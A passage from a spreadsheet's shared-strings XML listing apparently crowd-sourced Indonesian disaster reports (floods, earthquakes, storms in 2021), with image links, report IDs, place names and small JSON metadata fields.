    <t>https://lh3.googleusercontent.com/0NVt0eCKw96VHox0uGUXPf5zbTQrrmlAYoIhvEoF91_GrEHh5B6xxAZc2EWtKJKF7qEOPBQe2MCkZaaG4Wf46MxJNBe4o8VAZJTlu17azw=s480-c</t>
  </si>
  <si>
    <t>banjir lagi pdhl hujan ga lama, kali menguap, sdh ga nampung, jl. sd inpres rt 004/002, kelurahan rambutan, kecamatan ciracas, harap keruk kali atau solusi lainnya #KerukKali</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/tc5PmhbALm1NTfNyzdkTir8vcQbEhSeyZ_nOIXMq4zQTcpHy9Ddl9uJeX_UDTDnc_P-d-GvywO6awpHOIiRTZSPP5WoD2gG1WX8oiWwqhQ=s480-c</t>
  </si>
  <si>
    <t>tiap kali ujan pasti banjir pak mohon supaya got aliran dari kantor kecamatan Ciracas Jakarta timur masuk ke lingkungan RT, 17 RW 06 rambutan Ciracas. mohon pak</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/WnuEGBjCAXkNCXt4gMxf8TtECx6Ip8QPOIa_fCgBoYWlc3FiUehccPyhlaOP5v5xPLQp3wh2NOOqf7jvaOPyYuMR2urmDnj-jCvjbIKU4Q=s480-c</t>
  </si>
  <si>
    <t>mohon kepada dinas yang terkait supaya di selesaikan banjir terus menerus tiap hujan di lingkungan kami di rt 017/06 rambutan gang mangiri.</t>
  </si>
  <si>
    <t>b29e7e88-6182-4c68-ac60-d487a5c9b944</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b29e7e88-6182-4c68-ac60-d487a5c9b944.jpg</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/76TQM-ZUgrMvZf4qTdovQ5Co4_Sqp4gq7Fka2akFl67BiwQoycuG5I4dCz6khbe3LOJ-QvAIGbkks5NKSKl2vIm57EoyGbj7hlpYrcsUhw=s480-c</t>
  </si>
  <si>
    <t>#genangan mohon agar ditindak lanjuti bapak\u1f64f\u1f64f"</t>
  </si>
  <si>
    <t>464d4819-7465-4334-91e6-602a2fa27d46</t>
  </si>
  <si>
    <t>https://images.petabencana.id/464d4819-7465-4334-91e6-602a2fa27d46.jpg</t>
  </si>
  <si>
    <t>Jangan melewati jalanan ini</t>
  </si>
  <si>
    <t>Bacem</t>
  </si>
  <si>
    <t>Ponggok</t>
  </si>
  <si>
    <t>5df2fe8f-7382-4a11-934e-958bd73c7a46</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5df2fe8f-7382-4a11-934e-958bd73c7a46.jpg</t>
  </si>
  <si>
    <t>Banjir luapan sungai kedung galeng, di Dringu kab. Probolinggo</t>
  </si>
  <si>
    <t>Kedungdalem</t>
  </si>
  <si>
    <t>Dringu</t>
  </si>
  <si>
    <t>d07973e5-93fb-48ed-bd93-a19256481e66</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d07973e5-93fb-48ed-bd93-a19256481e66.jpg</t>
  </si>
  <si>
    <t>Banjir (kedua kalinya di 2021) di perumahan pondok Maharta tgl 9 Maret 2021.</t>
  </si>
  <si>
    <t>dd674416-0224-4b2b-9883-07e3bf76809d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dd674416-0224-4b2b-9883-07e3bf76809d.jpg</t>
  </si>
  <si>
    <t>Telah terjadi bencana di wilayah A yang menyebabkan kerusakan parah pada bangunan</t>
  </si>
  <si>
    <t>Candi Mulyo</t>
  </si>
  <si>
    <t>7f3e73e9-17b7-41b7-8209-ebcbb0cde55f</t>
  </si>
  <si>
    <t>Terjadi dahan pohon yang patah akibat angin kencang di jl. Dewi Sartika Singaraja</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/tkHjslqPOKvSu0O6m9e9nNtSE-gsDtpfUnTiYg0tyM4-u3mA6-Xl3qL0RNR-X5MsfMzKuJbf4VgdlNsltq6StkIHwqclKxRu-_eezBPo3Pk=s480-c</t>
  </si>
  <si>
    <t>penyebab banjir, kali perlu dikeruk tanahnya berikut sampah</t>
  </si>
  <si>
    <t>Sudimara Selatan</t>
  </si>
  <si>
    <t>167f988b-4bd7-4866-a1a8-e84e03c5f8ec</t>
  </si>
  <si>
    <t>https://images.petabencana.id/167f988b-4bd7-4866-a1a8-e84e03c5f8ec.jpg</t>
  </si>
  <si>
    <t>Kanal meluap dan banjir setinggi paha orng dewas</t>
  </si>
  <si>
    <t>Paropo</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/358305</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/03/10/1615371027557733378.jpg</t>
  </si>
  <si>
    <t>Jalan Kincan Raya Masih Tergenang Air Imbas Hujan Kemarin</t>
  </si>
  <si>
    <t>Hujan satu hari yang lalu, Jalan Kincan masih tergenang air.</t>
  </si>
  <si>
    <t>1803103d-e776-4d64-8031-343abee84f1a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1803103d-e776-4d64-8031-343abee84f1a.jpg</t>
  </si>
  <si>
    <t>Moncongloe</t>
  </si>
  <si>
    <t>Maros</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/R9H4lWarEoxpOQejUxKBZ4zoBpfyonQfFsLagoQ7Fi5Fc3jVLfQNnI6UagWcGV8CtnbHGKqfJVz1bclqEhjNO0lgRaTSMFWTupaqjDSn=s480-c</t>
  </si>
  <si>
    <t>banjirrrr.. harap pompa segera dinyalakan..</t>
  </si>
  <si>
    <t>7a287beb-999d-417b-b5b6-51e5fda642c7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7a287beb-999d-417b-b5b6-51e5fda642c7.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2429", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir Gang Langgar Jl. Wijaya I, Petogogan, Jaksel, Kamis jam 00.31 wib 11 Mar 2021</t>
  </si>
  <si>
    <t>a38bb73e-897e-469b-8c51-6de854839f96</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a38bb73e-897e-469b-8c51-6de854839f96.jpg</t>
  </si>
  <si>
    <t>Banjir ketinggian 50cm di RW.003 Kelurahan Petogogan, Kebayoran Baru, Jakarta Selatan</t>
  </si>
  <si>
    <t>b37487fd-3319-4a46-b35e-bcf29d730e0e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b37487fd-3319-4a46-b35e-bcf29d730e0e.jpg</t>
  </si>
  <si>
    <t>Lokasi kompleks Bung permai Tamalanrea-Mksr,  ketinggian bervariasi maksimal 60cm, berdampak sekitar 200-250 rmh</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/FJonIhiqfKX04-QWOSd7AmKFDYVhAe9SmxYCoO9HeyKWh8rlRPl99Kig8_bHhdlJG_Rsx0LTM1uWJs4hh9ASoUgGvdxeoAxZObjwCgcyyCk=s480-c</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/MA8_I6JhZfAo6IAEmNUVMYaFTojc735oIJkf9FoA1MkTWMFTdBOKhNdbYe_HIKChywdyNwVbF-C4_ZwiNMt9pv-Tw7xSIVWmL-pCATT_=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1587", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>tidak ada saluran airnya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/0nv55fdYKXxR0I9Inpi_ayr8YqBOIikTkLwfTPwHGJpUtdO4QjMTUJHAAH8YLEoRADcusA660zaNy6vslS5PiLdp20kR2OJGaxXJRjnPtRk=s480-c</t>
  </si>
  <si>
    <t>air masuk kerumah ngk ada saluranya</t>
  </si>
  <si>
    <t>8c2d2379-874c-4155-a5e1-2b3311335aec</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8c2d2379-874c-4155-a5e1-2b3311335aec.jpg</t>
  </si>
  <si>
    <t>the most flooded area in San Fernando Pampanga</t>
  </si>
  <si>
    <t>809c92d9-2bf9-4476-89b0-8028827a34c6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/809c92d9-2bf9-4476-89b0-8028827a34c6.jpg</t>
  </si>
  <si>
    <t>bdea2257-36bf-475b-ad9b-e5f71e3725cf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bdea2257-36bf-475b-ad9b-e5f71e3725cf.jpg</t>
  </si>
  <si>
    <t>uasvivsadvvdas</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/hgJjQP-jaspDwqVL-jcSvPcKT_FNhd-vlzq41KE70jx0gqC_hyaWaA5Z0RXz7RO_F1pwbYCEi_r1LRlTkBb0sKep0yck9KWuBK9272ICZg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1997", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>got nya rembes dari saluran RPTRA.. jadi bikin becek rumah warga..."</t>
  </si>
  <si>
    <t>b0d61555-011a-484a-af62-c2cd262044c6</t>
  </si>
  <si>
    <t>Mencoba aplikasi</t>
  </si>
  <si>
    <t>Tanahsareal</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/jb-gH9km5vlOltmqMbtiT0k6pEIIqfTwxI8AbKkYXhW3UVAbCChMH7lXm8n8Gg1hAKBG6rwmEcPLlXiBDox8yoMSVWMSI9U8uDLUy0-7eg=s480-c</t>
  </si>
  <si>
    <t>tidak ada saluran air bisa jalan rusak</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/6yk5UvB8ab6Ij76FpmZy4UJ7cVWbWfxeThW_QnMEepS0jojbKLZ-Wu2661KcWiP9-lt3RjnY8DB458oXMoHvH5oIWuHY-3drPbuUF92P=s480-c</t>
  </si>
  <si>
    <t>bisa cepet  rusak  jalan ngk ada saluran air</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/A6-Vd5PyxeXFvaqblMX7N964EmRGSbWgyopGEI7lH5mm5EURrZTg2SeHQ948Z7olpQ-P1eOlYMP1aOnbxhoa3EkdtQzw_0c-qtS-VVoxjw=s480-c</t>
  </si>
  <si>
    <t>tidak ada saluran air  jalan cepet rusak</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/z8KlGnvjzOGqtUVegCzQKeWunTUIQ1qDv08DAFbD6KeenTogFfjd_W8Q_0IPlv4NiYlLtME1Y666JMHpSYjbrFWtORRVjFlI_uG-HU2K7w=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1541", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>jln sianimbar rt 09/06 kel.cipayung terdapat lumpur yang tinggi sehingga tidak lancar jln ya air</t>
  </si>
  <si>
    <t>e04aeb89-4f1f-4a04-83e3-e498bf41ab13</t>
  </si>
  <si>
    <t>Dii daerah jalan rayanya semata kaki lebih, tpi di pemukimannya sudah se dada orang dewasa, untuk foto realnya blm ada krna lwat tdi kehujan</t>
  </si>
  <si>
    <t>Melayu</t>
  </si>
  <si>
    <t>Teweh Tengah</t>
  </si>
  <si>
    <t>Barito Utara</t>
  </si>
  <si>
    <t>893da8dd-5353-4491-b642-38f2eaec6fa5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/893da8dd-5353-4491-b642-38f2eaec6fa5.jpg</t>
  </si>
  <si>
    <t>Mekar Mulya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/H95aDHEvXXJaF6ZD5X6S1G9ymrpJfRFpnhBYVYtK4-KcTtGxt--gVwJhaRz4op-FPbFACpYehbvjmU3rz4QJwWMPcei-syBnHCXe4kh9E3g=s480-c</t>
  </si>
  <si>
    <t>kabel berantakan di Halte Busway Harmoni</t>
  </si>
  <si>
    <t>fb4b7831-323e-4414-a7d7-648ab679f755</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fb4b7831-323e-4414-a7d7-648ab679f755.jpg</t>
  </si>
  <si>
    <t>Semut</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/358545</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/03/26/358545-1616757575318370832.mp4-03.jpg</t>
  </si>
  <si>
    <t>Cari Alternatif Lain, Jalan Moh Toha Tergenang Air</t>
  </si>
  <si>
    <t>Jalan terusan moh toha / palasari, sore ini tergenang air, pengendara hendaknya berhati hati atau cari jalan alternatif lain</t>
  </si>
  <si>
    <t>Pasawahan</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/358548</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/03/26/358548-1616757841776175892.mp4-03.jpg</t>
  </si>
  <si>
    <t>Hujan Deras Membuat Ruas Jalan Moh Toha Tergenang Air</t>
  </si>
  <si>
    <t>Hujan yang mengguyur sore ini, akibatkan banjir di jalan terusan moh toha hingga jalan cisirung kab bandung</t>
  </si>
  <si>
    <t>7718338f-15ae-40aa-8b1c-2aec41edc9cb</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "346", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>189 cm</t>
  </si>
  <si>
    <t>6200a686-89ca-4990-a024-657e80ca99a6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6200a686-89ca-4990-a024-657e80ca99a6.jpg</t>
  </si>
  <si>
    <t>assalamu'alaikum,,gaes yuk jaga kebersihan dan kesehatan.. Buanglah sampah pada tempatnya agar tidak menyebabkan kebanjiran...staysafe yaa??</t>
  </si>
  <si>
    <t>c8893b76-41bf-4cd2-a71c-e8c8269f8fe0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c8893b76-41bf-4cd2-a71c-e8c8269f8fe0.jpg</t>
  </si>
  <si>
    <t>assalamu'alaikum,Ges staysafe yaa, jangan lupa buang sampah pada tempatnya agar tidak menyebabkan kebanjiran,,dan jangan lupa jaga kesehatan</t>
  </si>
  <si>
    <t>efc8e6ca-010b-4c96-9bf8-b58da1ec59a3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/efc8e6ca-010b-4c96-9bf8-b58da1ec59a3.jpg</t>
  </si>
  <si>
    <t>Sedangkan gempa bumi kedua dengan magnitudo 5,0 terjadi pada pukul 04.10 WIB dengan titik episentrum 4,34 Lintang Selatan dan 102,13 Bujur T</t>
  </si>
  <si>
    <t>Meranti Jaya</t>
  </si>
  <si>
    <t>Ujan Mas</t>
  </si>
  <si>
    <t>Kepahiang</t>
  </si>
  <si>
    <t>06976ed0-7d50-427a-8a50-13465091eb71</t>
  </si>
  <si>
    <t>https://images.petabencana.id/06976ed0-7d50-427a-8a50-13465091eb71.jpg</t>
  </si>
  <si>
    <t>Banjir di kota Kediri karena selokan tersumbat #bersamakurangiresiko"</t>
  </si>
  <si>
    <t>16d7b8f7-c328-4abb-901d-06369c0c47b9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/16d7b8f7-c328-4abb-901d-06369c0c47b9.jpg</t>
  </si>
  <si>
    <t>bba014c9-3d09-499d-87de-04adcd7508ad</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bba014c9-3d09-499d-87de-04adcd7508ad.jpg</t>
  </si>
  <si>
    <t>Hujan terjadi pukul 7 pagi hingga sore hari sehingga banjir kiriman menggenangi Kota Bima,</t>
  </si>
  <si>
    <t>Paruga</t>
  </si>
  <si>
    <t>Rasanae Barat</t>
  </si>
  <si>
    <t>Bima</t>
  </si>
  <si>
    <t>4081c799-6d89-410d-b07e-737894d45ca4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4081c799-6d89-410d-b07e-737894d45ca4.jpg</t>
  </si>
  <si>
    <t>Banjir kiriman sejak jam 10 malam sampai saat ini belum ada evakuasi</t>
  </si>
  <si>
    <t>Rabakodo</t>
  </si>
  <si>
    <t>Woha</t>
  </si>
  <si>
    <t>aa558df3-3d59-4052-a219-e7cb6e3ca95e</t>
  </si>
  <si>
    <t>Dsn rabakodo</t>
  </si>
  <si>
    <t>Nggembe</t>
  </si>
  <si>
    <t>Bolo</t>
  </si>
  <si>
    <t>d8f195d8-6f4e-4f94-894f-4f263e5cecc6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d8f195d8-6f4e-4f94-894f-4f263e5cecc6.jpg</t>
  </si>
  <si>
    <t>https://twitter.com/shockedcatt/status/1377975201711812609</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/VWEz8IrsNkfQUjFUL71Bww7VQiQrXR9lZDMT4jT3LyMWJfeSn8YTjGcqDXXLBW5PlXqA40u71rdCS5FqkzICQrPuMMkqwXaw8ha0dHDg=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil  bisa merusak jalan</t>
  </si>
  <si>
    <t>4bca51ea-28a0-4112-ae72-71dd62bb5e77</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4bca51ea-28a0-4112-ae72-71dd62bb5e77.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-NT" }</t>
  </si>
  <si>
    <t>Kondisi Terkini Di Kecamatan Malaka Tengah, Aintasi, Wederok dan Sekitarnya</t>
  </si>
  <si>
    <t>Kateri</t>
  </si>
  <si>
    <t>Malaka Tengah</t>
  </si>
  <si>
    <t>Malaka</t>
  </si>
  <si>
    <t>Nusa Tenggara Timur</t>
  </si>
  <si>
    <t>81fade8f-e412-4b2b-8f6c-0073d81d152f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/81fade8f-e412-4b2b-8f6c-0073d81d152f.jpg</t>
  </si>
  <si>
    <t>Banjir Area Kawangu Sumba Timur NTT karena badai La Nina. Kejadian ini baru saja terjadi kali ini. Bendungan sudah mulai retak</t>
  </si>
  <si>
    <t>Kelurahan Mauhau</t>
  </si>
  <si>
    <t>Kambera</t>
  </si>
  <si>
    <t>Sumba Timur</t>
  </si>
  <si>
    <t>b8a01bd3-e4cf-41f9-8b5f-0b9e5bf92220</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b8a01bd3-e4cf-41f9-8b5f-0b9e5bf92220.jpg</t>
  </si>
  <si>
    <t>Tiap hujan banjir di perum deppen sleman. Kayaknya tata air perlu diperbaiki</t>
  </si>
  <si>
    <t>1d73d8a4-f65f-414c-95e1-a8dd6ddb3d97</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1d73d8a4-f65f-414c-95e1-a8dd6ddb3d97.jpg</t>
  </si>
  <si>
    <t>Banjir, badai, jembatan putus, longsor yang terjadi di hampir seluruh daerah ntt</t>
  </si>
  <si>
    <t>Oebobo</t>
  </si>
  <si>
    <t>Kota Kupang</t>
  </si>
  <si>
    <t>1c5d7a18-7737-4319-aaef-9ad2187d283d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1c5d7a18-7737-4319-aaef-9ad2187d283d.jpg</t>
  </si>
  <si>
    <t>Banjir bandang meliputi seluruh NTT,banyak Rumah hanyut akibat hujan deras, tanah longsor. Dan sudah banyak merengut korban jiwa</t>
  </si>
  <si>
    <t>228eed36-5c99-42e5-8a9f-c697dcc7b919</t>
  </si>
  <si>
    <t>https://images.petabencana.id/228eed36-5c99-42e5-8a9f-c697dcc7b919.jpg</t>
  </si>
  <si>
    <t>Banjir bandang, warga di penampungan hanya dengan pakaian seadanya butuh makanan dan lain2</t>
  </si>
  <si>
    <t>Lewoleba Tengah</t>
  </si>
  <si>
    <t>Nubatukan</t>
  </si>
  <si>
    <t>Lembata</t>
  </si>
  <si>
    <t>5748ca07-e163-43b2-b5d3-07aa58ac76bd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5748ca07-e163-43b2-b5d3-07aa58ac76bd.jpg</t>
  </si>
  <si>
    <t>Banjir di hampir selurub wilayah NTT</t>
  </si>
  <si>
    <t>Namosain</t>
  </si>
  <si>
    <t>Alak</t>
  </si>
  <si>
    <t>1f88f2b6-bbaa-45ae-b1ee-de8e250ea811</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1f88f2b6-bbaa-45ae-b1ee-de8e250ea811.jpg</t>
  </si>
  <si>
    <t>Rainawe</t>
  </si>
  <si>
    <t>Kobalima</t>
  </si>
  <si>
    <t>cb7b6469-2c44-4122-b576-d29b731494b3</t>
  </si>
  <si>
    <t>selain banjir dan tanah longsor, sekarang NTT sedang dilanda hujan besar serta angin kencang</t>
  </si>
  <si>
    <t>Sikumana</t>
  </si>
  <si>
    <t>Maulafa</t>
  </si>
  <si>
    <t>fa4bccb1-73f0-4be2-bf1a-9868157f470d</t>
  </si>
  <si>
    <t>Debit air sudah 100an cm</t>
  </si>
  <si>
    <t>Kelurahan Kambaniru</t>
  </si>
  <si>
    <t>15665a4f-9a4c-46a7-a1a6-fa02cb5fdd3b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/15665a4f-9a4c-46a7-a1a6-fa02cb5fdd3b.jpg</t>
  </si>
  <si>
    <t>Blackout, kabel putus</t>
  </si>
  <si>
    <t>69a12dd0-3337-4a3d-bf73-2e234cd2bb14</t>
  </si>
  <si>
    <t>https://images.petabencana.id/69a12dd0-3337-4a3d-bf73-2e234cd2bb14.jpg</t>
  </si>
  <si>
    <t>Hujan disertai angin kencang dan blackout dampak dari Siklon Seroja</t>
  </si>
  <si>
    <t>Kelapa Lima</t>
  </si>
  <si>
    <t>bc65139e-1693-4fa9-9af9-9a8b251b9d93</t>
  </si>
  <si>
    <t>Bahaya..</t>
  </si>
  <si>
    <t>Kotawetan</t>
  </si>
  <si>
    <t>Garut Kota</t>
  </si>
  <si>
    <t>4044f955-7250-439e-bbf2-87091d25c77b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4044f955-7250-439e-bbf2-87091d25c77b.jpg</t>
  </si>
  <si>
    <t>Please help me</t>
  </si>
  <si>
    <t>Maidang</t>
  </si>
  <si>
    <t>Kambata Mapambuhang</t>
  </si>
  <si>
    <t>5ac55c77-5154-4876-aa1d-5a804693fbc0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5ac55c77-5154-4876-aa1d-5a804693fbc0.jpg</t>
  </si>
  <si>
    <t>Telah terjadi bencana banjir yg menggenangi area babdara umbu mehang kunda waingapu sampai di landasan pacu hingga mengakibatkan penutupan</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/358670</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/04/05/1617598564775627350.jpg</t>
  </si>
  <si>
    <t>Banjir di NTT, Jembatan Penghubung 2 Kecamatan Terputus</t>
  </si>
  <si>
    <t>Jembatan terputus akibat banjir bandang, jembatan penghubung dua Kecamatan baik Adonara Timur dengan Ile Boleng, siang ini (Senin, 5/04/2021) sejumlah warga membangun sementara jembatan dengan puing-puing bangunan, agar memperlancar arus distribusi bantu</t>
  </si>
  <si>
    <t>90c20bbe-bb73-4ec6-bbef-928042f62c8c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/90c20bbe-bb73-4ec6-bbef-928042f62c8c.jpg</t>
  </si>
  <si>
    <t>Kelurahan Lambanapu</t>
  </si>
  <si>
    <t>a84cba34-af1f-4b13-875d-e56c0b461a1d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a84cba34-af1f-4b13-875d-e56c0b461a1d.jpg</t>
  </si>
  <si>
    <t>Sampai saat ini angin kencang di sertai hujan Pantaun senkom sumba timur"</t>
  </si>
  <si>
    <t>Kelurahan Matawai</t>
  </si>
  <si>
    <t>Kota Waingapu</t>
  </si>
  <si>
    <t>1fc6aede-8bc8-46bf-8f0f-9c579b5cc22e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1fc6aede-8bc8-46bf-8f0f-9c579b5cc22e.jpg</t>
  </si>
  <si>
    <t>Sampai saat ini masih hujan  di sertai angin kencang @senkom mitra polri sumba timur"</t>
  </si>
  <si>
    <t>Kelurahan Kamalaputi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/vh5WBf4w1ZLqDt1xYJZxsGNo5kRR0Lx6TKFl5C9ZPPgnlXQbXtdkaPLLkAlNkLy3uI40G6Jgv2aShyYbvjrIGnML9ZAh25C7pX-bcYsivQ=s480-c</t>
  </si>
  <si>
    <t>ngk ada saluran air jalan rusak</t>
  </si>
  <si>
    <t>3efa066b-dd9e-4a89-a334-93f2ce1620a7</t>
  </si>
  <si>
    <t>Oh</t>
  </si>
  <si>
    <t>Sei Tuan</t>
  </si>
  <si>
    <t>Pantai Labu</t>
  </si>
  <si>
    <t>a900ca5b-c761-45a3-a41e-ceaf780c55bc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a900ca5b-c761-45a3-a41e-ceaf780c55bc.jpg</t>
  </si>
  <si>
    <t>Bencana Banjir Bandang di Desa Tamak Kecamatan Pantar Timur Kabupaten Alor NTT</t>
  </si>
  <si>
    <t>Nule</t>
  </si>
  <si>
    <t>Pantar Timur</t>
  </si>
  <si>
    <t>Alor</t>
  </si>
  <si>
    <t>6b6b7ec1-ece6-4416-9c52-287e121cb691</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6b6b7ec1-ece6-4416-9c52-287e121cb691.jpg</t>
  </si>
  <si>
    <t>Banjir bandang terjadi di pulau Alor NTT di Alor selatan sekitar wilayah ini. Foto ini adalah dampak setelah banjir bandang di desa Pureman</t>
  </si>
  <si>
    <t>Kiraman</t>
  </si>
  <si>
    <t>Alor Selatan</t>
  </si>
  <si>
    <t>088387b1-f068-47c8-940e-4b68fbf25848</t>
  </si>
  <si>
    <t>https://images.petabencana.id/088387b1-f068-47c8-940e-4b68fbf25848.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "fire", "fireDistance": 261.204693, "fireLocation": { "lat": -6.175713, "lng": 106.836634 }, "personLocation": { "lat": -6.175392, "lng": 106.827153 }, "fireRadius": { "lat": -6.175158, "lng": 106.838930 } }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "760", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Trial input</t>
  </si>
  <si>
    <t>7d8d548e-ceac-4fe1-a0f9-b1cd2cf1ce12</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7d8d548e-ceac-4fe1-a0f9-b1cd2cf1ce12.jpg</t>
  </si>
  <si>
    <t>Banjir Bandang di Bima, Dua Warga Meninggal</t>
  </si>
  <si>
    <t>Rasabou</t>
  </si>
  <si>
    <t>4b7a2977-47e0-4798-b8b8-8749d27dfa66</t>
  </si>
  <si>
    <t>Terasa gempa, masyarakat keluar rumah karena takut. Belum ada kerusakan.</t>
  </si>
  <si>
    <t>9ccf8f57-338d-44ff-a77e-d1bbb021712d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9ccf8f57-338d-44ff-a77e-d1bbb021712d.jpg</t>
  </si>
  <si>
    <t>Gempa terasa kencang</t>
  </si>
  <si>
    <t>Dinoyo</t>
  </si>
  <si>
    <t>c821c081-9e27-49a9-936c-4b43827a00c4</t>
  </si>
  <si>
    <t>Gempa terasa tp tidak ada kerusakan</t>
  </si>
  <si>
    <t>Sidomulyo</t>
  </si>
  <si>
    <t>9b0eedef-1442-483a-a4c6-030e96c1c7cf</t>
  </si>
  <si>
    <t>Tidak Ada Korban Atau Pun Kerusakan Yg Di Sebabkan Oleh Gempa</t>
  </si>
  <si>
    <t>Klojen</t>
  </si>
  <si>
    <t>fda86026-1ed3-41fb-b619-541af8a68740</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fda86026-1ed3-41fb-b619-541af8a68740.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "report_type": "structure", "structureFailure": 0 }</t>
  </si>
  <si>
    <t>Area perum bumi asri terasa banget ati2 guys mudah2 g ada korban, cz di rumah agak bnyk retakan di tmbok</t>
  </si>
  <si>
    <t>Mulyoagung</t>
  </si>
  <si>
    <t>Dau</t>
  </si>
  <si>
    <t>614caa1a-ba93-444b-a96c-f879c4dc67f1</t>
  </si>
  <si>
    <t>Terjadi gempa lumayan kencang. Namun tidak menyebabkan kerusakan. Stay safe.</t>
  </si>
  <si>
    <t>Kapas</t>
  </si>
  <si>
    <t>Sukomoro</t>
  </si>
  <si>
    <t>d8989e4a-1ce7-4d0a-bc79-37108e09cf7a</t>
  </si>
  <si>
    <t>Terjadi gempa lumayan kencang. Namun tidak menyebabkan kerusakan. Stay safe guys</t>
  </si>
  <si>
    <t>Mangun Dikaran</t>
  </si>
  <si>
    <t>0d4fe8e1-00d0-47dc-a2ce-76242df448c9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0d4fe8e1-00d0-47dc-a2ce-76242df448c9.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "report_type": "structure", "structureFailure": 1 }</t>
  </si>
  <si>
    <t>Rumah roboh</t>
  </si>
  <si>
    <t>694da8f5-011b-4979-9f23-9ab8a0b2465a</t>
  </si>
  <si>
    <t>Daerah Kecamatan Purwosari, Kabupaten Pasuruan terjadi sedikit gempa</t>
  </si>
  <si>
    <t>Sumber Suko</t>
  </si>
  <si>
    <t>Purwosari</t>
  </si>
  <si>
    <t>87dd9222-2568-4548-9b19-41315a3c2d26</t>
  </si>
  <si>
    <t>Terjadi keretakan sedikit namun hanya 1 rumah, yang lainnya masih dalam keadaan normal</t>
  </si>
  <si>
    <t>1b759cf9-bab2-4bc3-b413-b7f284b5becb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1b759cf9-bab2-4bc3-b413-b7f284b5becb.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "road", "accessabilityFailure": 1, "condition": 0 }</t>
  </si>
  <si>
    <t>Gempa cukup terasa</t>
  </si>
  <si>
    <t>13a3524c-5b9e-4472-931b-bfe6aad2f677</t>
  </si>
  <si>
    <t>https://images.petabencana.id/13a3524c-5b9e-4472-931b-bfe6aad2f677.jpg</t>
  </si>
  <si>
